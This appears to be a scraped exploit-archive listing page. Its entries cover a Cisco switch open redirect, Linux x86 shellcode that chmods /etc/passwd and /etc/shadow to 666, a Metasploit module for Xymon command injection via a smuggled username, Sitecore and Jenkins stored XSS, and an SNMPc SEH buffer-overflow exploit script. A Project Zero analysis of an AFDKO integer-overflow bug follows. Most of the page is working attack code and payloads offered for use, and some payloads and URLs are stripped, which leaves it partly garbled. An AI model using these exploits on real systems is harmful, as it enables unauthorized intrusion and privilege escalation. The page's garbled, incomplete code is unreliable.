Cisco Small Business switches versions 200, 300, and 500 suffer from information leakage and open redirection vulnerabilities.

MD5 | eb2b5e1203a3fa2ae1b9100c12d53de7

# Exploit Title: CISCO Small Business 200, 300, 500 Switches Multiple Vulnerabilities.
# Shodan query: /config/log_off_page.html
# Discovered Date: 07/03/2014
# Reported Date: 08/04/2019
# Exploit Author: Ramikan
# Website:
# Vendor Homepage:
# Affected Devices: The affected products are all Cisco Small Business 200, 300, and 500 Series Managed Switches with the web management interface enabled,
# Tested On: Cisco C300 Switch
# Version:
# CVE : CVE-2019-1943
# CVSS v3: 4.7 (AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N)
# Category:Hardware, Web Apps
# Reference :


Vulnerability 1: Information Gathering


Unauthenticated user can find the version number and device type by visiting this link directly.

Affected URL:



Vulnerability 2: Open Redirect due to host header.


Can change to different domain under the host header and redirect the request to fake website and can be used for phishing attack also can be used for domain fronting.

Normal Request

GET / HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Connection: close
Cache-Control: max-age=0

Normal Response

HTTP/1.1 302 Redirect
Server: GoAhead-Webs
Date: Fri Mar 07 09:40:22 2014
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html

This document has moved to a new location.
Please update your documents to reflect the new location.


Host Header changed to different domain (example


GET /cs703dae2c HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: activeLangId=English; isStackableDevice=false
Upgrade-Insecure-Requests: 1


HTTP/1.1 302 Redirect
activeLangId=English; isStackableDevice=falseServer: GoAhead-Webs
Date: Fri Mar 07 09:45:26 2014
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html

This document has moved to a new location.
Please update your documents to reflect the new location.

The redirection is happening to The attacker need to be in same network and should be able to modify the victims request on the wire in order to trigger this vulnerabilty.

Attack Vector:
Can be used for domain fronting.

curl -k --header "Host:" "domainname of the cisco device"

Vendor Response:

Issue 1:
Due to the limited information given out, we are not considering it a vulnerability as such. Still, it would be better if it was not happening, so, we will treat it as a hardening enhancement.

Issue 2:
The developers won't be able to provide a fix for this in the short term (90 days), so, we are planning to disclose this issue through an advisory on July 17th 2019.

We have assigned CVE CVE-2019-1943 for this issue.


61 bytes small Linux/x86 chmod 666 /etc/passwd and chmod 666 /etc/shadow shellcode.

MD5 | 1d275af34ac3eb4e6782353a61ffbebe

# Exploit Title: Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow (61 bytes)
# Date: 10/07/2019
# Exploit Author: Xavier Invers Fornells
# Contact:
# Tested on: Debian 4.19.28
# Architecture: x86
# Size: 61 bytes

#################################### chmod.nasm ####################################

global _start
section .text

push byte 15
pop eax
push byte 0x64
push word 0x7773
push 0x7361702f
push 0x6374652f
mov ebx, esp

push word 0x1b6
pop ecx

int 0x80

push byte 15
pop eax
push byte 0x77
push word 0x6f64
push 0x6168732f
push 0x6374652f
mov ebx, esp

push word 0x1b6
pop ecx

int 0x80

push byte 1
pop eax
int 0x80

#################################### shellcode.c ####################################


unsigned char code[] =


printf("Shellcode Length: %dn", strlen(code));

int (*ret)() = (int(*)())code;



This Metasploit module exploits a command injection vulnerability in Xymon versions before 4.3.25 which allows authenticated users to execute arbitrary operating system commands as the web server user. When adding a new user to the system via the web interface with, the user’s username and password are passed to htpasswd in a call to system() without validation. This module has been tested successfully on Xymon version 4.3.10 on Debian 6.

MD5 | 5d1fdb4c7a1abc1fbc3c13a84a4a2eef

# This module requires Metasploit:
# Current source:

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
'Name' => 'Xymon useradm Command Execution',
'Description' => %q{
This module exploits a command injection vulnerability in Xymon
versions before 4.3.25 which allows authenticated users
to execute arbitrary operating system commands as the web
server user.

When adding a new user to the system via the web interface with
``, the user's username and password are passed to
`htpasswd` in a call to `system()` without validation.

This module has been tested successfully on Xymon version 4.3.10
on Debian 6.
'License' => MSF_LICENSE,
'Author' => [
'Markus Krell', # Discovery
'bcoles' # Metasploit
'References' =>
['CVE', '2016-2056'],
['PACKETSTORM', '135758'],
['URL', ''],
['URL', ''],
['URL', ''],
['URL', '']
'DisclosureDate' => '2016-02-14',
'Platform' => %w(unix linux solaris bsd),
'Targets' =>
'Unix CMD',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' => {
'Space' => 2048,
'BadChars' => "x00x0Ax0D",
'DisableNops' => true,
'Compat' =>
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python netcat php'
'Platform' => 'linux',
'Arch' => [ARCH_X86,ARCH_X64],
'Platform' => 'solaris',
'Arch' => [ARCH_X86]
'Platform' => 'bsd',
'Arch' => [ARCH_X86, ARCH_X64]
'Privileged' => false,
'DefaultTarget' => 0))
register_options(['TARGETURI', [
true, 'The base path to Xymon secure CGI directory', '/xymon-seccgi/'
]),'USERNAME', [true, 'The username for Xymon']),'PASSWORD', [true, 'The password for Xymon'])

def user

def pass

def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, ''),
'authorization' => basic_auth(user, pass)

unless res
vprint_status "#{peer} - Connection failed"
return CheckCode::Unknown

if res.code == 401
vprint_status "#{peer} - Authentication failed"
return CheckCode::Unknown

if res.code == 404
vprint_status "#{peer} - not found"
return CheckCode::Safe

unless res.body.include?('Xymon')
vprint_status "#{peer} - Target is not a Xymon server."
return CheckCode::Safe

version = res.body.scan(/>Xymon ([d.]+)</).flatten.first

unless version
vprint_status "#{peer} - Could not determine Xymon version"
return CheckCode::Detected

vprint_status "#{peer} - Xymon version #{version}"

if >='4.3.25')
return CheckCode::Safe


def execute_command(cmd, opts = {})
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, ''),
'method' => 'POST',
'authorization' => basic_auth(user, pass),
'vars_post' => Hash[{
'USERNAME' => "';#{cmd} & echo '",
'PASSWORD' => '',
'SendCreate' => 'Create'
}, 5)

return if session_created?

unless res
fail_with(Failure::Unreachable, 'Connection failed')

if res.code == 401
fail_with(Failure::NoAccess, 'Authentication failed')

unless res.code == 500
fail_with(Failure::Unknown, 'Unexpected reply')

print_good "#{peer} - Payload sent successfully"


def exploit
unless [Exploit::CheckCode::Detected, Exploit::CheckCode::Appears].include?(check)
fail_with Failure::NotVulnerable, 'Target is not vulnerable'

if payload.arch.first == 'cmd'
execute_cmdstager(linemax: 1_500)

Sitecore version 9.0 rev 171002 suffers from a persistent cross site scripting vulnerability.

MD5 | 39d6c982acaa37a46cb0a8d2e1d7da4c

# Exploit Title: Stored Cross Site Scripting (XSS) in Sitecore 9.0 rev 171002
# Date: July 11, 2019
# Exploit Author: Owais Mehtab
# Vendor Homepage:
# Version: 9.0 rev. 171002
# Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519
# CVE : CVE-2019-13493

Vendor Description
Sitecore CMS makes it effortless to create content and experience rich websites that help you achieve your business goals such as increasing sales and search engine visibility, while being straight-forward to integrate and administer. Sitecore lets you deliver sites that are highly scalable, robust and secure. Whether you're focused on marketing, development and design, or providing site content, Sitecore delivers for you.

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Vulnerability Class
Cross-site Scripting (XSS) -

Proof of Concept
File Extension parameter is not properly escaped. This could lead to an XSS attack that could possibly affect administrators,users,editor.

1. Login to application and navigate to " Editor.aspx?sw_bw=1"
2. Go to media library and click on any image and edit it
3. Now in Extension input parameter inject any XSS vector like '">

SNMPc Enterprise Edition versions 9 and 10 suffer from a mapping filename buffer overflow vulnerability.

MD5 | 109af1e27d2b7507c41e3905ac72c086

# -*- coding: utf-8 -*-

# Exploit: SNMPc Enterprise Edition (9 & 10) (Mapping File Name BOF) #
# Date: 11 July 2019 #
# Exploit Author: @xerubus | #
# Vendor Homepage: #
# Software Linke: #
# Version: Enterprise Editioin 9 & 10 #
# Tested on: Windows 7 #
# CVE-ID: CVE-2019-13494 #
# Full write-up: #
import sys, os

_ _
___ (~ )( ~)
/ _ / /
| D_ ] / -= SNMPc_Mapping_BOF by @xerubus =-
| D _]/ -= We all have something to hide =-
___/ / / \
(_ )( _)

junk = "A" * 2064
nseh = "xebx07x90x90" # short jmp to 0018f58d xebx07x90x90
seh = "x05x3cx0ex10" # 0x100e3c05 ; pop esi # pop edi # ret (C:program files (x86)snmpc network managerCRDBAPI.dll)

# Pre-padding of mapping file. Note mandatory trailing character return.
pre_padding = (
"Name,Type,Address,ObjectID,Description,ID,Group1,Group2,Icon,Bitmap,Bitmap Scale,Shape/Thickness,Parent,Coordinates,Linked Nodes,Show Label,API Exec,MAC,Polling Agent,Poll Interval,Poll Timeout,Poll Retries,Status Variable,Status Value,Status Expression,Services,Status,Get Community,Set Community,Trap Community,Read Access Mode,Read/Write Access Mode,V3 NoAuth User,V3 Auth User,V3 Auth Password,V3 Priv Password"
""Root Subnet","Subnet","","","","2","000=Unknown","","auto.ico","","2","Square","(NULL)","(0,0)","N/A","True","auto.exe","00 00 00 00 00 00","","30","2","2","","0","0","","Normal-Green","public","netman","public","SNMP V1","SNMP V1","","","",""n"

# Post-padding of mapping file. Note mandatory trailing character return.
post_padding = (
"","Device","","","","3","000=Unknown","000=Unknown","auto.ico","","2","Square","Root Subnet(2)","(-16,-64)","N/A","True","auto.exe","00 00 00 00 00 00","","30","2","2","","0","=","","Normal-Green","public","netman","public","SNMP V1","SNMP V1","","","",""n")

# msfvenom —platform windows -p windows/exec cmd=calc.exe -b "x00x0ax0d" -f c
shellcode = (

print "[+] Building payload.."
payload = "x90" * 10 + shellcode
print "[+] Creating buffer.."
buffer = pre_padding + junk + nseh + seh + payload + "x90" * 10 + post_padding
print "[+] Writing evil mapping file.."
textfile = open(filename , 'w')
print "[+] Done. Import evilmap.csv into SNMPc and A Wild Calc Appears!nn"

Jenkins Dependency Graph View plugin version 0.13 suffers from a persistent cross site scripting vulnerability.

MD5 | c1ce6b865eb9188b93661b01f4e2d546

# Exploit Title:  Persistent XSS - Dependency Graph View Plugin(v0.13)
# Vendor Homepage:
# Exploit Author: Ishaq Mohammed
# Contact:
# Website:
# Category: webapps
# Platform: Java
# CVE: CVE-2019-10349
# Jenkins issue: #SECURITY-1177

1. Description:
The "Display Name" field in General Options of the Configure module in
Jenkins was found to be accepting arbitrary value which when loaded in the
Dependency Graph View module gets execute which makes it vulnerable to a
Stored/Persistent XSS.
2. Proof of Concept:
Vulnerable Source
Steps to Reproduce:
Login to Jenkins Server with valid credentials and ensure that the
dependency graph plugin is installed.
1. Click on configure the Jenkins plugin.
2. Select advanced options
3. Enter the XSS payload in the "Display Name" field
4. Navigate to Dependency Graph module
5. Observe the Executed Payload
6. Payload used for the demo:

3. Solution:
As of publication of this advisory, there is no fix.
The plugin hsa been abandoned by the maintainer


Best Regards,
Ishaq Mohammed

There is a Microsoft Font Subsetting DLL heap corruption vulnerability in ComputeFormat4CmapData.

MD5 | 1e6e251496d7be9a3bc32fd32fae64ff

Microsoft DirectWrite / AFDKO suffers from a heap-baeed out-of-bounds read/write vulnerability in OpenType font handling due to empty ROS strings.

MD5 | b63dfd0988e7941848953c7d532f19e2

Microsoft DirectWrite / AFDKO suffers from having an insufficient integer overflow check in dnaGrow.

MD5 | d82c47ee0ae57de226097bbbba93f262

Microsoft DirectWrite / AFDKO insufficient integer overflow check in dnaGrow 

-----=====[ Background ]=====-----

AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.

At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.

We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.

One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input.

-----=====[ Description ]=====-----

The AFDKO library has its own implementation of dynamic arrays, semantically resembling e.g. std::vector from C++. These objects are implemented in c/public/lib/source/dynarr/dynarr.c and c/public/lib/api/dynarr.h. One of the more important functions operating on dynarrays is dnaGrow(), designed to extend a dynamic array or set its initial size. It is used by numerous other routines such as dnaSetCnt, dnaIndex, dnaMax, dnaNext, dnaExtend, or the dnaSET_CNT macro. It should be noted that it is potentially possible for the function's arguments to be unsanitized values loaded directly from an input font.

In order to prevent security vulnerabilities stemming from arithmetic errors while calculating buffer lengths, dnaGrow() explicitly checks for integer overflow conditions. One example of such check is shown below:

--- cut ---
79 } else if (da->size == 0) {
80 /* Initial allocation */
81 size_t init = (size_t)da->array;
82 size_t new_mem_size;
83 new_size = ((size_t)index incr) / da->incr * da->incr;
84 new_mem_size = new_size * elemsize;
85 if (new_mem_size / elemsize == new_size) /* check math overflow */
86 new_ptr = h->mem.manage(&h->mem, NULL, new_mem_size);
87 else
88 new_ptr = NULL;
89 } else {
--- cut ---

The if statement in line 85 guarantees that "new_mem_size" is exactly the product of "new_size" and "elemsize", and an integer overflow doesn't take place. There is also a similar check in another code branch a few lines below:

--- cut ---
89 } else {
90 /* Incremental allocation */
91 new_size = da->size +
92 ((index - da->size) + da->incr) / da->incr * da->incr;
93 if (new_size * elemsize >= new_size) /* check math overflow */
94 new_ptr = h->mem.manage(&h->mem, da->array, new_size * elemsize);
95 else
96 new_ptr = NULL;
97 }
--- cut ---

Here, the overflow check in line 93 is incorrect. It is possible to craft the "new_size" and "elemsize" values such that an undetected integer overflow takes place. For instance, on 32-bit platforms, if new_size=0x58000000 and elemsize=0x4, then (size_t)(new_size * elemsize) is 0x60000000, truncated from the actual result of 0x160000000. These example values pass the above sanity check, but still lead to the allocation of a too small buffer in relation to the requested number of elements.

While there is an evident problem in the code, we haven't found an obvious way to exploit it after a brief analysis. We believe that this is mostly caused by the fact that the faulty code is found in a code branch responsible for incrementally extending the size of a non-empty array, and not the one performing the initial allocation. There are few arrays which are grown dynamically during the library run time; most of them have their length set only once and never changed later on. It is even more difficult to find a dynamically extended array which accepts completely arbitrary element counts.

Nevertheless, given the right set of conditions (currently or in the future), this bug might facilitate the exploitation of an integer overflow condition that would otherwise be impossible to trigger. As such an integer overflow could subsequently lead to memory corruption, we decided to report the problem despite the apparent lack of an attack vector at this moment. We recommend fixing it by using the correct overflow check construct from line 85.

-----=====[ References ]=====-----


This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Found by:

Microsoft DirectWrite / AFDKO suffers from a stack corruption vulnerability in OpenType font handling while processing CFF blend DICT operator.

MD5 | 743e9318dc7ba438e2b58cc2c6bfdc2f